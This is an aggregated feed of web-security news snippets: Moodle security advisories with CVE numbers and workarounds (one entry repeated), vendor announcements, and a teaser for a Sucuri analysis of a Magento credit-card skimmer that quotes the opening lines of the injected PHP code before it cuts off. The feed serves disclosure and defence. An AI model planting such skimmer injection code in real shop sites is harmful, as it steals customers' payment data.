by Michael Hawkins. Messaging did not impose a character limit when sending messages, which could result in client-side (browser) denial of service for users receiving very large messages.Severity/Risk:MinorVersions affected:3.10, 3.9 to 3.9.3, 3.8 to 3.8.6, 3.5 to 3.5.15 and earlier unsupported versionsVersions fixed:3.10.1, 3.9.4, 3.8.7 and 3.5.16Reported by:Rik GouwCVE identifier:CVE-2021-20185Changes
More info:
https://moodle.org/mod/forum/discuss.php?d=417168&parent=1680841
by Michael Hawkins. If the TeX notation filter was enabled, additional sanitizing of TeX content was required to prevent the risk of stored XSS.Severity/Risk:SeriousVersions affected:3.10, 3.9 to 3.9.3, 3.8 to 3.8.6, 3.5 to 3.5.15 and earlier unsupported versionsVersions fixed:3.10.1, 3.9.4, 3.8.7 and 3.5.16Reported by:Ata HakcilWorkaround:Disable the TeX notation filter until the patch has been applied. (Note that this filter is disabled by default.)CVE identifier:CVE-2021-20186Changes
More info:
https://moodle.org/mod/forum/discuss.php?d=417170&parent=1680845
by Michael Hawkins. It was possible for site administrators to execute arbitrary PHP scripts via a PHP include used during Shibboleth authentication.Severity/Risk:SeriousVersions affected:3.10, 3.9 to 3.9.3, 3.8 to 3.8.6, 3.5 to 3.5.15 and earlier unsupported versionsVersions fixed:3.10.1, 3.9.4, 3.8.7 and 3.5.16Reported by:Frédéric MassartWorkaround:Harcode preventexecpath to true in config.php, which prevents site administrators setting some executable paths via the UI. See
More info:
https://moodle.org/mod/forum/discuss.php?d=417171&parent=1680847
by Michael Hawkins. It was possible for site administrators to execute arbitrary PHP scripts via a PHP include used during Shibboleth authentication.Severity/Risk:SeriousVersions affected:3.10, 3.9 to 3.9.3, 3.8 to 3.8.6, 3.5 to 3.5.15 and earlier unsupported versionsVersions fixed:3.10.1, 3.9.4, 3.8.7 and 3.5.16Reported by:Frédéric MassartWorkaround:Harcode preventexecpath to true in config.php, which prevents site administrators setting some executable paths via the UI. See
More info:
https://moodle.org/mod/forum/discuss.php?d=417171&parent=1680847
Wordfence, the leading provider of WordPress security software and services, is announcing today that we are, effective immediately, offering free site cleaning and site security audit services to K-12 public schools in the United States who use WordPress as their content management system. Whether a site is infected with malware, or you are looking for […]
More info:
https://www.wordfence.com/blog/2021/01/announcing-free-site-cleaning-site-security-audits-for-k-12-public-schools/
A Magento website owner was concerned about malware and reached out to our team for assistance. Upon investigation, we found the website contained a PHP injection in one of the Magento files: ./app/code/core/Mage/Payment/Model/Method/Cc.php … if ($_SERVER[“REQUEST_METHOD”] === “GET”){ if (strpos($_SERVER[“REQUEST_URI”], “/onestepcheckout/index/”) !== false){ if(!isset($_COOKIE[“adminhtml”])){ echo
More info:
http://feedproxy.google.com/~r/sucuri/blog/~3/pp87qW5hBU0/magento-php-injection-loads-javascript-skimmer.html
Today we are in the third week of 2021, and we are happy to announce the third plugin update of the year: Password Policy Manager 2.3.4. This update features better interoperability with third party plugins, a few minor improvements, and a number of bug fixes. Let’s dive right into the below highlight to see what […]
More info:
https://www.wpwhitesecurity.com/ppmwp-2-3-4/
In mass infection scenarios, our Malware Research team often looks for attack vectors to find patterns and other similarities among compromised websites. The identification of these patterns allows us to deploy better and faster solutions to our customers, minimizing impacts from massive attacks. Recently during a routine investigation, we found a number of vulnerabilities in […]
More info:
http://feedproxy.google.com/~r/sucuri/blog/~3/--9_7xc3sO4/critical-vulnerabilities-in-123contactform-for-wordpress-wordpress-plugin.html
WordPress security can be intimidating, but it doesn’t have to be. In this comprehensive guide to WordPress security, we’ve simplified the basics of securing your WordPress website so that any non-technical person can understand and protect their website from hacker attacks. This guide to WordPress security is broken down into 10 easily digestible sections. Each […]
More info:
https://ithemes.com/wordpress-security-the-ultimate-guide/
2020 has been a challenging year for many. However, we have been very lucky and even though it was challenging, we’ve made the best out of it, and we turned it into a big one! So we wanted to take the time and look back at everything that happened at WP White Security. With remote […]
More info:
https://www.wpwhitesecurity.com/2020-year-review/
